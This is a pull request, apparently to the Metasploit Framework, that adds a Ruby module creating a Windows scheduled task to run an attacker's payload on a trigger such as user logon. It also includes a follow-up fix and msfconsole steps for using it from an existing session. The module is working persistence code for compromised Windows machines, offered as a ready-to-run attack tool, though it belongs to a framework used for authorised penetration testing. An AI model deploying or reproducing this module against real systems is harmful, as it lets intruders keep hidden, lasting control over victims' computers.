### PR TITLE
Tasksched persistence

### DIFF
--- a/modules/exploits/windows/local/tasksched_persistence.rb
+++ b/modules/exploits/windows/local/tasksched_persistence.rb
@@ -1,0 +1,53 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  # include Msf::Post::File
+  include Msf::Post::Windows::TaskScheduler
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Task Scheduler Persistence',
+        'Description' => %q{
+          This module will create a scheduled task that will be run a given payload
+          every time a given trigger is hit. This may function similar to cron in linux.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Nick Cottrell <Rad10Logic>',
+        ],
+        'Platform' => [ 'windows' ],
+        'Arch' => ARCH_CMD,
+        'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],
+        'DefaultOptions' => { 'DisablePayloadHandler' => true },
+        'Targets' => [
+          ['Automatic', {} ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-05-17',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TASK_NAME', [true, 'the Name given to the new task'])
+    ])
+  end
+
+  def exploit
+    # deal with quote misappropriation
+    escaped_payload = payload.encoded.gsub(/"/) { |match| '\\' + match }
+    vprint_status("Payload: #{escaped_payload}")
+    task_create(datastore['TASK_NAME'], escaped_payload)
+  end
+end

--- a/modules/exploits/windows/local/tasksched_persistence.rb
+++ b/modules/exploits/windows/local/tasksched_persistence.rb
@@ -30,6 +30,9 @@ class MetasploitModule < Msf::Exploit::Local
           ['Automatic', {} ],
         ],
         'DefaultTarget' => 0,
+        'Payload' => {
+          'Space' => 260
+        },
         'DisclosureDate' => '2023-05-17',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -46,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit
     # deal with quote misappropriation
-    escaped_payload = payload.encoded.gsub(/"/) { |match| '\\' + match }
+    escaped_payload = payload.encoded.lstrip.gsub(/"/) { |match| '\\' + match }
     vprint_status("Payload: #{escaped_payload}")
     task_create(datastore['TASK_NAME'], escaped_payload)
   end


### PR DESCRIPTION
This module simply adds a method of persistence to windows by utilizing task scheduler. There werent any that anyone had already published, so I made one.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/local/tasksched_persistence`
- [ ] `set TASK_NAME puppies`
- [ ] `set SESSION <session-id>`
- [ ] utilize standard task scheduler options
- [ ] `run`

When it comes to running tasks, I tested with my user by setting
```
ScheduleObfuscationTechnique => NONE
ScheduleRunAs => <username>
ScheduleType => ONLOGON
```
This made testing very easy for me.